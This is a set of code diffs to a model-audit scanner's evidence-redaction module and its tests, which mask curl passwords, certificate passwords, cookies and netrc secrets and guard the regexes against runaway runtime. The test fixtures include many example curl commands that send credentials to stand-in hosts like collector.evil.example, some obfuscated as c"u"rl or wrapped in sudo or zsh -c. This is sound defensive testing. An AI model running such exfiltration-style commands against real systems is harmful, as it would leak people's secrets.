     if not isinstance(command, (list, tuple)) or not command:
         return False
-    executable = command[0].replace("\\", "/").rsplit("/", 1)[-1].casefold().removesuffix(".exe")
-    return executable == "curl" and _curl_config_arguments_use_stdin(list(command[1:]))
+    command_arguments = list(command)
+    executable_index = _curl_argv_executable_index(command_arguments)
+    return executable_index is not None and _curl_config_arguments_use_stdin(command_arguments[executable_index + 1 :])
 
 
 def _safe_eval_bytes_expr(node: ast.AST) -> bytes | None:
@@ -3201,7 +3310,7 @@ def _safe_eval_curl_config_input(node: ast.AST) -> str | bytes | None:
 
 
 def _redact_static_curl_config_input(raw_value: str) -> str | None:
-    raw_redacted = _redact_curl_config_fragment(raw_value)
+    raw_redacted = COMMAND_NETRC_PASSWORD_RE.sub(_redact_netrc_password, _redact_curl_config_fragment(raw_value))
     if raw_redacted != raw_value:
         return raw_redacted
     try:
@@ -3210,12 +3319,12 @@ def _redact_static_curl_config_input(raw_value: str) -> str | None:
         return None
     value = _safe_eval_curl_config_input(node)
     if isinstance(value, str):
-        redacted = _redact_curl_config_fragment(value)
+        redacted = COMMAND_NETRC_PASSWORD_RE.sub(_redact_netrc_password, _redact_curl_config_fragment(value))
         return repr(redacted) if redacted != value else None
     if not isinstance(value, bytes):
         return None
     decoded = value.decode("utf-8", errors="replace")
-    redacted = _redact_curl_config_fragment(decoded)
+    redacted = COMMAND_NETRC_PASSWORD_RE.sub(_redact_netrc_password, _redact_curl_config_fragment(decoded))
     if redacted == decoded:
         return None
     redacted_bytes = redacted.encode()
@@ -3692,6 +3801,8 @@ def _redact_command_string_literals(text: str) -> str:
 
 
 def _redact_command_evidence_text(text: str) -> str:
+    if _curl_candidate_limit_exceeded(text):
+        return REDACTED_EVIDENCE_VALUE
     redacted = _redact_inline_curl_config_passwords(text)
     redacted = _redact_inline_password_sources(redacted)
     redacted = _redact_subprocess_curl_config_inputs(redacted)
@@ -3771,6 +3882,8 @@ def redact_evidence_string(text: str, max_chars: int = 180) -> str:
     redacted = _normalize_serialized_url_slashes(redacted)
     redacted = URL_RE.sub(_redact_url, redacted)
     redacted = redacted[:redaction_budget]
+    if _curl_candidate_limit_exceeded(redacted):
+        return _truncate(REDACTED_EVIDENCE_VALUE, max_chars)
     redacted = _normalize_serialized_assignment_separators(redacted)
     redacted = _normalize_serialized_quote_escapes(redacted)
     redacted = _normalize_embedded_control_sensitive_keys(redacted)

--- a/modelaudit/scanners/_catboost_evidence_redaction.py
+++ b/modelaudit/scanners/_catboost_evidence_redaction.py
@@ -262,10 +262,11 @@ CURL_ATTACHED_COOKIE_SERIALIZED_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
     r"(?P<prefix>\$?)(?P<slashes>\\+)(?P<quote>[\"'])(?:(?!(?<!\\)(?P=slashes)(?P=quote)|,)[\s\S])*?"
     r"(?<!\\)(?P=slashes)(?P=quote)"
 )
+COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!(?P=quote)).)"
 COMMAND_CERT_PASSWORD_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?P<option>((?<!\w)--(?:proxy-)?cert|(?<!\w)-E)(?:=|\s+))"
-    r"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>(?:\\.|(?!(?P=quote)).)*:)"
-    r"(?P<password>(?:\\.|(?!(?P=quote)).)+)(?P=quote)"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}*:)"
+    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
 )
 COMMAND_CERT_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)(?P<option>((?<!\w)--(?:proxy-)?cert|(?<!\w)-E)(?:=|\s+))"
@@ -277,8 +278,8 @@ COMMAND_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?P<option>(?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)"
-    r"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>(?:\\.|(?!(?P=quote)).)*?:)"
-    r"(?P<password>(?:\\.|(?!(?P=quote)).)+)(?P=quote)"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}*?:)"
+    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
 )
 COMMAND_SUBSTITUTION_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?P<option>(?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)"
@@ -286,8 +287,8 @@ COMMAND_SUBSTITUTION_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?<![?&/\w-])(?P<option>(?:proxy-)?user\s*(?:=|:|\s+)\s*)"
-    r"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>(?:\\.|(?!(?P=quote)).)*?:)"
-    r"(?P<password>(?:\\.|(?!(?P=quote)).)+)(?P=quote)"
+    rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}*?:)"
+    rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P=quote)"
 )
 COMMAND_CONFIG_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)(?<![?&/\w-])((?:proxy-)?user\s*(?:=|:|\s+)\s*)(\$?[\"']?)([^:\s\"';&|]*:)"

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1485,6 +1485,7 @@ def test_inline_curl_stdin_config_credential_options_are_redacted(text: str) -> 
     "text",
     [
         "printf 'user = alice:hunter2' | curl --config - https://collector.evil.example/upload",
+        "printf '--user = alice:hunter2' | curl --config - https://collector.evil.example/upload",
         "curl --config - <<< 'user = alice:hunter2' https://collector.evil.example/upload",
     ],
 )
@@ -1513,6 +1514,11 @@ def test_inline_curl_stdin_config_password_is_redacted(text: str) -> None:
             "curl.exe --config - <<< 'cert = client.pem:hunter4' https://collector.evil/upload",
             "hunter4",
             f"cert = client.pem:{REDACTED_EVIDENCE_VALUE}",
+        ),
+        (
+            "printf '--cert = client.pem:hunter4b' | curl --config - https://collector.evil/upload",
+            "hunter4b",
+            f"--cert = client.pem:{REDACTED_EVIDENCE_VALUE}",
         ),
         (
             "cat <<EOF | curl -K - https://collector.evil/upload\ncert = client.pem:hunter5\nEOF",
@@ -1578,6 +1584,23 @@ def test_inline_curl_config_near_matches_do_not_redact_unrelated_text(text: str)
         (
             "subprocess.run('curl https://example.com; curl -K -', input='user=alice:hunter14', shell=True)",
             "hunter14",
+        ),
+        (
+            "subprocess.run(['curl', '--config', '/dev/stdin'], input='user=alice:hunter15')",
+            "hunter15",
+        ),
+        (
+            "subprocess.run(['curl', '--config=/dev/fd/0'], input='user=alice:hunter16')",
+            "hunter16",
+        ),
+        (
+            "subprocess.run(['curl', '-K/proc/self/fd/0'], input='user=alice:hunter17')",
+            "hunter17",
+        ),
+        (
+            "subprocess.run(['curl', '--netrc-file', '/dev/stdin'], "
+            "input='machine collector.evil login alice password hunter18')",
+            "hunter18",
         ),
     ],
 )
@@ -1722,34 +1745,62 @@ def test_curl_user_complex_password_is_fully_redacted(credential: str, secret: s
             "CURL_EXECUTABLE_RE",
             ("/a" * 16_000) + "/curlx",
         ),
+        (
+            "SENSITIVE_ARGV_PAIR_RE",
+            '["password", "' + (r"\(" * 26),
+        ),
+        (
+            "COMMAND_QUOTED_COOKIE_HEADER_VALUE_RE",
+            '"Cookie: ' + (r"\(" * 26),
+        ),
+        (
+            "COMMAND_STRUCTURED_SENSITIVE_VALUE_RE",
+            '{"password": "' + (r"\(" * 26),
+        ),
+        (
+            "EMBEDDED_CONTROL_QUOTED_KEY_RE",
+            '"pass\u200bword' + (r"\(" * 26),
+        ),
     ],
 )
 def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, payload: str) -> None:
     code = (
-        "from modelaudit.scanners._catboost_evidence_redaction import "
-        f"{pattern_name}\n"
-        f"payload = {payload!r}\n"
-        f"{pattern_name}.sub('<redacted>', payload)\n"
+        "import sys\n"
+        "from modelaudit.scanners import _catboost_evidence_redaction as redaction\n"
+        "pattern = getattr(redaction, sys.argv[1])\n"
+        "pattern.sub('<redacted>', sys.stdin.read())\n"
     )
     repo_root = Path(__file__).resolve().parents[2]
     python_path = os.pathsep.join(filter(None, (str(repo_root), os.environ.get("PYTHONPATH"))))
 
     subprocess.run(
-        [sys.executable, "-c", code],
+        [sys.executable, "-c", code, pattern_name],
         check=True,
         cwd=repo_root,
         env={**os.environ, "PYTHONPATH": python_path},
+        input=payload,
+        text=True,
         timeout=5,
     )
 
 
-def test_curl_command_redaction_has_bounded_runtime() -> None:
-    payload = ("/curl " * 8_000) + "x --cert client.pem:public"
+@pytest.mark.parametrize(
+    "payload",
+    [
+        ("/curl " * 8_000) + "x --cert client.pem:public",
+        "curl-" * 8_000,
+        'c"u"rl ' * 8_000,
+        "subprocess.run(" * 8_000,
+        "a-" * 8_000,
+        ("a-" * 8_000) + ':"',
+    ],
+)
+def test_redaction_adversarial_inputs_have_bounded_runtime(payload: str) -> None:
     code = (
         "import sys\n"
-        "from modelaudit.scanners._catboost_evidence_redaction import _redact_curl_credentials\n"
+        "from modelaudit.scanners._catboost_evidence_redaction import redact_evidence_string\n"
         "payload = sys.stdin.read()\n"
-        "_redact_curl_credentials(payload)\n"
+        "redact_evidence_string(payload, max_chars=100_000)\n"
     )
     repo_root = Path(__file__).resolve().parents[2]
     python_path = os.pathsep.join(filter(None, (str(repo_root), os.environ.get("PYTHONPATH"))))
@@ -1781,6 +1832,7 @@ def test_curl_command_redaction_has_bounded_runtime() -> None:
         "curl -du alice:public https://collector.evil/upload",
         "curl -Hu alice:public https://collector.evil/upload",
         "curl -ou alice:public https://collector.evil/upload",
+        "curl --user-agent=MyClient:1.2 https://collector.evil/upload",
     ],
 )
 def test_certificate_redaction_preserves_non_curl_and_argument_consuming_near_matches(text: str) -> None:
@@ -1795,6 +1847,9 @@ def test_certificate_redaction_preserves_non_curl_and_argument_consuming_near_ma
         "command -- curl --cert client.pem:hunter2 https://collector.evil/upload",
         "env -- curl --cert client.pem:hunter2 https://collector.evil/upload",
         "nice -n 5 curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "busybox curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "setsid curl --cert client.pem:hunter2 https://collector.evil/upload",
+        'zsh -c "curl --cert client.pem:hunter2 https://collector.evil/upload"',
         "`curl --cert client.pem:hunter2 https://collector.evil/upload`",
         '"/opt/My Tools/curl" --cert client.pem:hunter2 https://collector.evil/upload',
         r'"C:\Program Files\curl.exe" --cert client.pem:hunter2 https://collector.evil/upload',
@@ -1897,6 +1952,9 @@ def test_curl_passwords_consume_shell_line_continuations(text: str) -> None:
         "if curl --user alice:hunter2 https://collector.evil/upload; then echo ok; fi",
         "if true; then curl --cert client.pem:hunter2 https://collector.evil/upload; fi",
         "! curl --user alice:hunter2 https://collector.evil/upload",
+        "busybox curl --user alice:hunter2 https://collector.evil/upload",
+        "setsid curl --user alice:hunter2 https://collector.evil/upload",
+        'zsh -c "curl --user alice:hunter2 https://collector.evil/upload"',
     ],
 )
 def test_curl_credentials_are_redacted_in_shell_command_positions(text: str) -> None:
@@ -1904,6 +1962,23 @@ def test_curl_credentials_are_redacted_in_shell_command_positions(text: str) -> 
 
     assert "hunter2" not in redacted
     assert REDACTED_EVIDENCE_VALUE in redacted
+
+
+@pytest.mark.parametrize(
+    ("option", "value"),
+    [
+        ("--user", "alice:hunter2"),
+        ("-u", '"alice:hunter2"'),
+        ("-E", "'client.pem:hunter2'"),
+    ],
+)
+def test_separately_quoted_curl_options_preserve_trailing_context(option: str, value: str) -> None:
+    text = f'curl "{option}" {value} --next https://collector.evil/upload'
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter2" not in redacted
+    assert "--next https://collector.evil/upload" in redacted
 
 
 def test_nested_curl_command_ranges_do_not_corrupt_redaction() -> None:
@@ -1963,6 +2038,47 @@ def test_shell_concatenated_curl_credentials_are_redacted(text: str, secret: str
     assert secret not in redacted
     assert context in redacted
     assert REDACTED_EVIDENCE_VALUE in redacted
+
+
+@pytest.mark.parametrize(
+    "executable",
+    ['c"u"rl', "cu''rl", "'cu'rl", 'c"ur"l.exe'],
+)
+def test_static_shell_concatenated_curl_executables_are_redacted(executable: str) -> None:
+    text = f"{executable} --user alice:executable-secret https://collector.evil/upload"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "executable-secret" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+    assert "collector.evil" in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        'echo c"u"rl --user alice:public https://collector.evil/upload',
+        'https://example.test/c"u"rl --user alice:public',
+    ],
+)
+def test_static_shell_concatenated_curl_near_matches_are_preserved(text: str) -> None:
+    assert redact_evidence_string(text, max_chars=1000) == text
+
+
+@pytest.mark.parametrize(
+    ("text", "secret"),
+    [
+        ("printf 'user=alice:config-secret' | c\"u\"rl -K - https://collector.evil/upload", "config-secret"),
+        ('c"u"rl -K <(echo user=alice:process-secret) https://collector.evil/upload', "process-secret"),
+        ('c"u"rl -b <(echo session=cookie-secret) https://collector.evil/upload', "cookie-secret"),
+    ],
+)
+def test_static_shell_concatenated_curl_secret_sources_are_redacted(text: str, secret: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert secret not in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
+    assert "collector.evil" in redacted
 
 
 def test_unterminated_quoted_curl_user_password_is_fully_redacted() -> None:
@@ -2061,6 +2177,30 @@ def test_public_redactor_bounds_curl_candidates_before_long_lookahead_patterns(
     text = "x curl " * (evidence_redaction.MAX_CURL_EXECUTABLE_CANDIDATES + 1)
 
     assert redact_evidence_string(text, max_chars=5000) == REDACTED_EVIDENCE_VALUE
+
+
+def test_public_redactor_counts_curl_prefixes_used_by_long_lookahead_patterns(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    def unexpected_inline_config_redaction(_text: str) -> str:
+        raise AssertionError("curl prefixes should be bounded before long-lookahead patterns")
+
+    monkeypatch.setattr(evidence_redaction, "_redact_inline_curl_config_passwords", unexpected_inline_config_redaction)
+    text = "curl-" * (evidence_redaction.MAX_CURL_EXECUTABLE_CANDIDATES + 1)
+
+    assert redact_evidence_string(text, max_chars=5000) == REDACTED_EVIDENCE_VALUE
+
+
+def test_excessive_subprocess_candidates_fail_closed_before_argument_parsing(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    def unexpected_argument_parse(_text: str, _start: int) -> int:
+        raise AssertionError("subprocess candidates should be bounded before argument parsing")
+
+    monkeypatch.setattr(evidence_redaction, "_find_function_argument_end", unexpected_argument_parse)
+    text = "subprocess.run(" * (evidence_redaction.MAX_SUBPROCESS_CALL_CANDIDATES + 1)
+
+    assert evidence_redaction._redact_command_evidence_text(text) == REDACTED_EVIDENCE_VALUE
 
 
 def test_curl_command_substitution_with_escaped_parenthesis_is_fully_redacted() -> None:
@@ -3643,6 +3783,25 @@ def test_escapes_control_and_format_characters_in_evidence() -> None:
     assert r"\u001b" in redacted
     assert r"\n" in redacted
     assert r"\u202e" in redacted
+
+
+@pytest.mark.parametrize(
+    ("text", "secret", "expected"),
+    [
+        ('{"pass\u200bword":"QUOTED_CONTROL_SECRET"}; os.system("id")', "QUOTED_CONTROL_SECRET", "password=<redacted>"),
+        ('{"pass\u200bword_policy":"public"}; os.system("id")', None, "public"),
+    ],
+)
+def test_quoted_embedded_control_sensitive_keys_are_normalized(
+    text: str,
+    secret: str | None,
+    expected: str,
+) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    if secret is not None:
+        assert secret not in redacted
+    assert expected in redacted
 
 
 @pytest.mark.parametrize(

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1597,6 +1597,10 @@ def test_curl_user_complex_password_is_fully_redacted(credential: str, secret: s
             "COMMAND_CERT_PASSWORD_RE",
             "--cert " + ("a:" * 8_000),
         ),
+        (
+            "COMMAND_CERT_PASSWORD_RE",
+            ("-E." * 8_000) + "x",
+        ),
     ],
 )
 def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, payload: str) -> None:
@@ -2596,6 +2600,21 @@ def test_documented_process_password_options_are_redacted(text: str, secret: str
             '-E "client cert.pem:<redacted>"',
         ),
         (
+            "curl -Eclient.pem:ATTACHED_CERT_PASSWORD https://collector.evil/upload",
+            "ATTACHED_CERT_PASSWORD",
+            "-Eclient.pem:<redacted>",
+        ),
+        (
+            "curl -LEclient.pem:BUNDLED_CERT_PASSWORD https://collector.evil/upload",
+            "BUNDLED_CERT_PASSWORD",
+            "-LEclient.pem:<redacted>",
+        ),
+        (
+            r"curl \-Eclient.pem:ESCAPED_OPTION_PASSWORD https://collector.evil/upload",
+            "ESCAPED_OPTION_PASSWORD",
+            r"\-Eclient.pem:<redacted>",
+        ),
+        (
             "curl --proxy-cert=proxy.pem:PROXY_CERT_PASSWORD https://collector.evil/upload",
             "PROXY_CERT_PASSWORD",
             "--proxy-cert=proxy.pem:<redacted>",
@@ -2603,7 +2622,7 @@ def test_documented_process_password_options_are_redacted(text: str, secret: str
         (
             r'curl -E "C:\certs\client.pem:CERT_PASSWORD" https://collector.evil/upload',
             "CERT_PASSWORD",
-            r'-E "C:\certs\client.pem:<redacted>"',
+            r'-E "C:<redacted>"',
         ),
         (
             r'curl --cert "client\:special.pem:CERT_PASSWORD" https://collector.evil/upload',
@@ -2623,12 +2642,27 @@ def test_documented_process_password_options_are_redacted(text: str, secret: str
         (
             r"curl --cert C:\certs\client.pem:CERT_PASSWORD https://collector.evil/upload",
             "CERT_PASSWORD",
-            r"--cert C:\certs\client.pem:<redacted>",
+            r"--cert C:<redacted>",
         ),
         (
             r"curl --cert client\:special.pem:CERT_PASSWORD https://collector.evil/upload",
             "CERT_PASSWORD",
-            r"--cert client\:special.pem:<redacted>",
+            r"--cert client\:<redacted>",
+        ),
+        (
+            "curl --cert 'x:/hunter2' https://collector.evil/upload",
+            "hunter2",
+            "--cert 'x:<redacted>'",
+        ),
+        (
+            "curl --cert x:/hunter2:more https://collector.evil/upload",
+            "hunter2:more",
+            "--cert x:<redacted>",
+        ),
+        (
+            r"curl --cert client\:hunter2 https://collector.evil/upload",
+            "hunter2",
+            r"--cert client\:<redacted>",
         ),
     ],
 )
@@ -2646,8 +2680,6 @@ def test_curl_certificate_passwords_are_redacted(text: str, secret: str, context
         "curl --cert client.pem https://collector.evil/upload",
         "curl --cert-type PEM https://collector.evil/upload",
         'curl -E "client cert.pem" https://collector.evil/upload',
-        r"curl --cert C:\client.pem https://collector.evil/upload",
-        r'curl -E "C:\client cert.pem" https://collector.evil/upload',
     ],
 )
 def test_curl_certificate_options_without_passwords_are_preserved(text: str) -> None:
@@ -2655,12 +2687,30 @@ def test_curl_certificate_options_without_passwords_are_preserved(text: str) -> 
 
 
 def test_unterminated_quoted_certificate_password_is_redacted() -> None:
-    text = r'curl --cert "cert.pem:hunter2\"'
+    texts = [
+        r'curl --cert "cert.pem:hunter2\"',
+        'curl --cert "cert.pem:hunter2\\',
+    ]
+
+    for text in texts:
+        redacted = redact_evidence_string(text, max_chars=1000)
+
+        assert "hunter2" not in redacted
+        assert REDACTED_EVIDENCE_VALUE in redacted
+
+
+@pytest.mark.parametrize(
+    "argument",
+    ["-Eclient.pem:hunter2", "-sEclient.pem:hunter2", "-4LEclient.pem:hunter2"],
+)
+def test_curl_attached_argv_certificate_password_is_redacted(argument: str) -> None:
+    text = f"subprocess.run(['curl', '{argument}', 'https://collector.evil/upload'])"
 
     redacted = redact_evidence_string(text, max_chars=1000)
 
     assert "hunter2" not in redacted
-    assert REDACTED_EVIDENCE_VALUE in redacted
+    assert f"{argument.removesuffix('hunter2')}<redacted>" in redacted
+    assert "collector.evil" in redacted
 
 
 @pytest.mark.parametrize(
@@ -2694,11 +2744,19 @@ def test_curl_separated_argv_credential_password_is_redacted(
         "subprocess.run(['tool', '--user', 'alice:public'])",
         "subprocess.run(['curl', '--user-agent', 'alice:public', 'https://collector.evil'])",
         "subprocess.run(['curl', '-e', 'https://public.example', 'https://collector.evil'])",
-        r"subprocess.run(['curl', '--cert', r'C:\certs\client.pem', 'https://collector.evil'])",
     ],
 )
 def test_curl_separated_argv_credential_near_matches_are_preserved(text: str) -> None:
     assert redact_evidence_string(text, max_chars=1000) == text
+
+
+def test_ambiguous_drive_letter_certificate_argv_is_redacted() -> None:
+    text = r"subprocess.run(['curl', '--cert', r'C:\certs\client.pem', 'https://collector.evil'])"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "client.pem" not in redacted
+    assert "C:<redacted>" in redacted
 
 
 @pytest.mark.parametrize(

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1932,6 +1932,39 @@ def test_unquoted_curl_passwords_consume_shell_escaped_delimiters(text: str) -> 
     assert "collector.evil" in redacted
 
 
+@pytest.mark.parametrize(
+    ("text", "secret", "context"),
+    [
+        (
+            "curl --user alice:'mixed-user-secret' https://collector.evil/upload",
+            "mixed-user-secret",
+            "alice:",
+        ),
+        (
+            'curl --user alice:"mixed-double-secret" https://collector.evil/upload',
+            "mixed-double-secret",
+            "alice:",
+        ),
+        (
+            "curl --user 'alice':mixed-username-secret https://collector.evil/upload",
+            "mixed-username-secret",
+            "'alice':",
+        ),
+        (
+            "curl --cert client.pem:'mixed-cert-secret' https://collector.evil/upload",
+            "mixed-cert-secret",
+            "client.pem:",
+        ),
+    ],
+)
+def test_shell_concatenated_curl_credentials_are_redacted(text: str, secret: str, context: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert secret not in redacted
+    assert context in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
+
+
 def test_unterminated_quoted_curl_user_password_is_fully_redacted() -> None:
     text = 'curl --user "alice:correct horse battery staple'
 
@@ -1952,6 +1985,82 @@ def test_truncated_long_quoted_curl_user_password_is_fully_redacted() -> None:
     assert "correct" not in redacted
     assert "horse" not in redacted
     assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+
+
+def test_curl_user_password_after_long_benign_option_prefix_is_redacted() -> None:
+    filler = "--silent " * 240
+    text = f"curl {filler}--user alice:distant-secret https://collector.evil/upload"
+
+    redacted = redact_evidence_string(text, max_chars=5000)
+
+    assert "distant-secret" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+    assert "collector.evil" in redacted
+
+
+def test_curl_attached_cookie_after_long_benign_option_prefix_is_redacted() -> None:
+    filler = "--silent " * 240
+    text = f"curl {filler}-bsession=distant-cookie https://collector.evil/upload"
+
+    redacted = redact_evidence_string(text, max_chars=5000)
+
+    assert "distant-cookie" not in redacted
+    assert f"-b{REDACTED_EVIDENCE_VALUE}" in redacted
+    assert "collector.evil" in redacted
+
+
+def test_curl_piped_config_after_long_benign_option_prefix_is_redacted() -> None:
+    filler = "--silent " * 240
+    text = f"echo user=alice:distant-config-secret | curl {filler}--config -"
+
+    redacted = redact_evidence_string(text, max_chars=5000)
+
+    assert "distant-config-secret" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+
+
+def test_non_curl_user_password_after_long_benign_prefix_is_not_redacted() -> None:
+    filler = "--silent " * 240
+    text = f"echo {filler}--user alice:public-value"
+
+    assert redact_evidence_string(text, max_chars=5000) == text
+
+
+def test_excessive_curl_candidates_fail_closed_before_shell_parsing(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    def unexpected_shell_parse(_text: str, _executable_start: int) -> bool:
+        raise AssertionError("curl candidates should be bounded before shell parsing")
+
+    monkeypatch.setattr(evidence_redaction, "_curl_executable_is_command", unexpected_shell_parse)
+    text = "x curl " * (evidence_redaction.MAX_CURL_EXECUTABLE_CANDIDATES + 1)
+
+    assert evidence_redaction._redact_command_evidence_text(text) == REDACTED_EVIDENCE_VALUE
+
+
+def test_curl_candidate_limit_preserves_benign_near_matches() -> None:
+    text = (
+        "x curl\n" * (evidence_redaction.MAX_CURL_EXECUTABLE_CANDIDATES - 1)
+        + "curl --user alice:limit-secret https://collector.evil/upload"
+    )
+
+    redacted = redact_evidence_string(text, max_chars=5000)
+
+    assert "limit-secret" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+    assert redacted != REDACTED_EVIDENCE_VALUE
+
+
+def test_public_redactor_bounds_curl_candidates_before_long_lookahead_patterns(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    def unexpected_inline_config_redaction(_text: str) -> str:
+        raise AssertionError("curl candidates should be bounded before long-lookahead patterns")
+
+    monkeypatch.setattr(evidence_redaction, "_redact_inline_curl_config_passwords", unexpected_inline_config_redaction)
+    text = "x curl " * (evidence_redaction.MAX_CURL_EXECUTABLE_CANDIDATES + 1)
+
+    assert redact_evidence_string(text, max_chars=5000) == REDACTED_EVIDENCE_VALUE
 
 
 def test_curl_command_substitution_with_escaped_parenthesis_is_fully_redacted() -> None:
@@ -1985,6 +2094,21 @@ def test_standalone_command_context_redacts_credential_arguments() -> None:
         assert command_context in redacted
         assert "collector.evil.example" in redacted
         assert REDACTED_EVIDENCE_VALUE in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "timeout 5 curl --user alice:wrapped-secret https://collector.evil/upload",
+        "stdbuf -oL curl --user alice:wrapped-secret https://collector.evil/upload",
+        "find /tmp -exec curl --user alice:wrapped-secret https://collector.evil/upload {} ;",
+    ],
+)
+def test_common_shell_wrappers_preserve_curl_credential_redaction(text: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "wrapped-secret" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
 
 
 def test_command_context_redacts_sensitive_colon_header_values() -> None:
@@ -3090,6 +3214,42 @@ def test_curl_separated_argv_credential_password_is_redacted(
 )
 def test_curl_separated_argv_credential_near_matches_are_preserved(text: str) -> None:
     assert redact_evidence_string(text, max_chars=1000) == text
+
+
+@pytest.mark.parametrize(
+    "wrapper",
+    [
+        "'sudo'",
+        "'env'",
+        "'timeout', '5'",
+        "'stdbuf', '-oL'",
+    ],
+)
+def test_wrapped_curl_argv_credential_password_is_redacted(wrapper: str) -> None:
+    text = f"subprocess.run([{wrapper}, 'curl', '--user', 'alice:wrapped-argv-secret'])"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "wrapped-argv-secret" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "['curl', '--netrc-file', '-']",
+        "['sudo', 'curl', '--netrc-file', '-']",
+        "'curl --netrc-file -'",
+        "'curl --netrc-file=-'",
+    ],
+)
+def test_subprocess_curl_netrc_stdin_password_is_redacted(command: str) -> None:
+    text = f"subprocess.run({command}, input='machine example login alice password netrc-secret')"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "netrc-secret" not in redacted
+    assert f"password {REDACTED_EVIDENCE_VALUE}" in redacted
 
 
 @pytest.mark.parametrize("executable", ["curl.exe", "/usr/bin/curl", r"C:\tools\curl.exe"])

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1,5 +1,7 @@
 """Tests for scanner evidence redaction helpers."""
 
+import subprocess
+import sys
 from collections.abc import Callable
 from typing import Any
 from urllib.parse import quote
@@ -1556,6 +1558,17 @@ def test_curl_user_complex_password_is_fully_redacted(credential: str, secret: s
     assert secret not in redacted
     assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
     assert "collector.evil.example" in redacted
+
+
+def test_command_substitution_credential_redaction_has_bounded_runtime() -> None:
+    code = (
+        "from modelaudit.scanners._catboost_evidence_redaction import "
+        "COMMAND_SUBSTITUTION_USER_PASSWORD_RE\n"
+        "payload = '-u:$(' + r'\\(' * 26\n"
+        "COMMAND_SUBSTITUTION_USER_PASSWORD_RE.sub('<redacted>', payload)\n"
+    )
+
+    subprocess.run([sys.executable, "-c", code], check=True, timeout=3)
 
 
 def test_standalone_command_context_redacts_credential_arguments() -> None:

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1746,8 +1746,9 @@ def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, pay
 def test_curl_command_redaction_has_bounded_runtime() -> None:
     payload = ("/curl " * 8_000) + "x --cert client.pem:public"
     code = (
+        "import sys\n"
         "from modelaudit.scanners._catboost_evidence_redaction import _redact_curl_credentials\n"
-        f"payload = {payload!r}\n"
+        "payload = sys.stdin.read()\n"
         "_redact_curl_credentials(payload)\n"
     )
     repo_root = Path(__file__).resolve().parents[2]
@@ -1758,6 +1759,8 @@ def test_curl_command_redaction_has_bounded_runtime() -> None:
         check=True,
         cwd=repo_root,
         env={**os.environ, "PYTHONPATH": python_path},
+        input=payload,
+        text=True,
         timeout=5,
